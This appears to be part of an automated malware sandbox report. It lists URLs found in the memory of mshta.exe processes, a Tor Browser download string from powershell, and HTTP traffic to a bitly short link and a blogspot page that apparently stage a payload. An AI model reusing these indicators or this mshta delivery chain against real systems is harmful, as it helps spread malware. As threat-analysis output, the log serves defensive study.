Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.279117021.00000000068CA000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000003.342606114.00000215A3D73000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.601581052.00000215A8B9B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.360185512.000001BEE8977000.00000004.00000001.sdmp, mshta.exe, 00000021.00000003.390770011.0000021CF2488000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.598269761.0000021CF6C4D000.00000004.00000001.sdmp String found in binary or memory: https://www.google.%/ads/ga-audiences
Source: mshta.exe, 0000001D.00000002.570273594.000001BEEAC93000.00000004.00000001.sdmp String found in binary or memory: https://www.google.%/ads/ga-audiences2
Source: mshta.exe, 0000000D.00000003.508915853.00000290ACEA4000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.623774532.00000215A9630000.00000004.00000001.sdmp String found in binary or memory: https://www.google.%/ads/ga-audienceshttps://stats.g.doubleclick.net/j/collecthttps://www.google.com
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/finance?tab=je..
Source: mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/intl/en-GB/about/products?tab=jh
Source: mshta.exe, 00000006.00000003.315362219.0000000006715000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/intl/en-GB/about/products?tab=jh4T
Source: mshta.exe, 0000001D.00000002.574898077.000001BEEADD5000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/intl/en-GB/about/products?tab=jhhe
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/intl/en-GB/about/products?tab=jhw6D
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385776898.000001BEED3A1000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/save
Source: mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/saveL
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/shopping?hl=en-GB&source=og&tab=jf
Source: mshta.exe, 00000006.00000003.315362219.0000000006715000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/shopping?hl=en-GB&source=og&tab=jfD
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/webhp?tab=jw
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://www.google.co.uk/webhp?tab=jw00
Source: mshta.exe, 00000006.00000003.282482509.000000000EAE1000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.462084143.00000290ABE3A000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.575444266.00000215A6101000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385678317.000001BEED482000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com
Source: mshta.exe, 00000006.00000002.427422063.00000000067CA000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.573256646.000001BEEAD2D000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/
Source: mshta.exe, 0000001D.00000002.573256646.000001BEEAD2D000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/)
Source: mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/4
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.279117021.00000000068CA000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000003.342606114.00000215A3D73000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.601581052.00000215A8B9B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.570273594.000001BEEAC93000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.360185512.000001BEE8977000.00000004.00000001.sdmp, mshta.exe, 00000021.00000003.390770011.0000021CF2488000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.598269761.0000021CF6C4D000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/ads/ga-audiences
Source: mshta.exe, 00000006.00000003.300811461.000000000AE98000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/ads/ga-audienceshttps://www.google.%/ads/ga-audiences
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chp
Source: mshta.exe, 00000006.00000002.427422063.00000000067CA000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389513364.000001BEEAD69000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/?brand=CHZO&utm_source=google.com&utm_medium=desktop-app-launcher&utm_
Source: mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389884952.000001BEEAD0D000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.556709892.0000021CF233E000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.css
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.css$
Source: mshta.exe, 0000001D.00000002.558814631.000001BEE8A42000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.css(
Source: mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.css-
Source: mshta.exe, 0000001D.00000003.389884952.000001BEEAD0D000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.css7
Source: mshta.exe, 0000001D.00000003.389884952.000001BEEAD0D000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.css:
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/css/maia.cssQQC:
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.cssa
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.cssh
Source: mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/css/maia.cssily=Open
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/css/maia.cssm/p/ghostbackup15.html%22=)
Source: mshta.exe, 0000001D.00000002.573256646.000001BEEAD2D000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/e
Source: mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/h4
Source: mshta.exe, 00000006.00000002.427422063.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/o?
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/support/accounts/bin/answer.py?hl
Source: mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657
Source: mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/travel/?dest_src=al
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.279117021.00000000068CA000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000003.342606114.00000215A3D73000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.601581052.00000215A8B9B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.570273594.000001BEEAC93000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.360185512.000001BEE8977000.00000004.00000001.sdmp, mshta.exe, 00000021.00000003.390770011.0000021CF2488000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.598269761.0000021CF6C4D000.00000004.00000001.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
Source: mshta.exe, 00000006.00000003.332704739.000000000DFD9000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.612130608.000001BEED439000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.
Source: mshta.exe, 00000021.00000002.573809584.0000021CF4684000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Source: mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svgR
Source: mshta.exe, 00000006.00000002.431162379.000000000A337000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svgy
Source: mshta.exe, 00000021.00000002.573809584.0000021CF4684000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark_clr_74x24px.svg
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark_clr_74x24px.svgapply(d
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark_clr_74x24px.svgsh(c.c
Source: mshta.exe, 00000021.00000002.573809584.0000021CF4684000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svg
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svg&(c=
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svg8/
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svg;b.pW
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svgL
Source: mshta.exe, 0000001D.00000003.388235434.000001BEEAD1F000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svgPV
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svgedP
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svgmb(
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svguc
Source: mshta.exe, 00000006.00000002.433660449.000000000A473000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.426367126.0000000006762000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.558643869.000001BEE8A30000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.556709892.0000021CF233E000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png
Source: mshta.exe, 00000006.00000003.309050554.000000000E037000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.560048090.00000215A3E56000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.556101893.0000021CF2312000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png)
Source: mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.pngPV
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.462084143.00000290ABE3A000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385678317.000001BEED482000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/search_black_24dp.png
Source: mshta.exe, 00000006.00000003.284167006.000000000E037000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315918707.000000000DF11000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.402196536.000000000A2FA000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.462832097.00000290ABE2B000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385678317.000001BEED482000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.573256646.000001BEEAD2D000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.609912843.000001BEED35E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.604188808.000001BEED297000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.383485693.000001BEEDE14000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.383394302.000001BEEDDFE000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.auSrFW-FX90.O/rt=j/m=q_dnp
Source: mshta.exe, 00000006.00000003.396240494.00000000068E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.430485385.000000000A2FC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.284167006.000000000E037000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315918707.000000000DF11000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.402196536.000000000A2FA000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.462832097.00000290ABE2B000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385678317.000001BEED482000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.573256646.000001BEEAD2D000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.609912843.000001BEED35E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.604188808.000001BEED297000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.383485693.000001BEEDE14000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.383394302.000001BEEDDFE000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.wtXa61WU3WQ.L.X.O/m=qawd
Source: mshta.exe, 00000006.00000003.395681837.000000000C3B0000.00000004.00000040.sdmp, mshta.exe, 0000001B.00000002.605755811.00000215A8DD0000.00000004.00000040.sdmp, mshta.exe, 00000021.00000002.618824886.0000021CF72F0000.00000004.00000040.sdmp String found in binary or memory: https://www.macromedia.com/support/flashplayer/sys/
Source: powershell.exe, 00000016.00000002.506840923.000001ACC5317000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.540176025.00000214F0058000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.556350637.0000021CF2327000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com
Source: mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com/?g
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com/?gl=GB&tab=j1
Source: unknown DNS traffic detected: queries for: bitly.com
Source: global traffic HTTP traffic detected: GET /yuiwqhdsavbdjagh HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitly.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaayoola.html HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: johonathahogyaabagebarhomeintum.blogspot.com
Source: global traffic HTTP traffic detected: GET /static/v1/widgets/1667664774-css_bundle_v2.css HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/403901366-ieretrofit.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=8965474558532949541&zx=9facc617-3779-4049-ad62-56a50925e3fb HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/1621653182-comment_from_post_iframe.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/widgets/4164007864-widgets.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: johonathahogyaabagebarhomeintum.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /img/icon18_edit_allbkg.gif HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: resources.blogblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html&type=blog HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.com
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.com
Source: global traffic HTTP traffic detected: GET /static/v1/v-css/281434096-static_pages.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/3101730221-analytics_autotrack.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogblog/data/1kt/simple/body_gradient_tile_light.png HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: resources.blogblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /img/share_buttons_20_3.png HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogblog/data/1kt/simple/gradients_light.png HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: resources.blogblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eot HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fonts.gstatic.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /img/blogger-logotype-color-black-1x.png HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.833016469.1631746236; _gid=GA1.2.19021443.1631746236
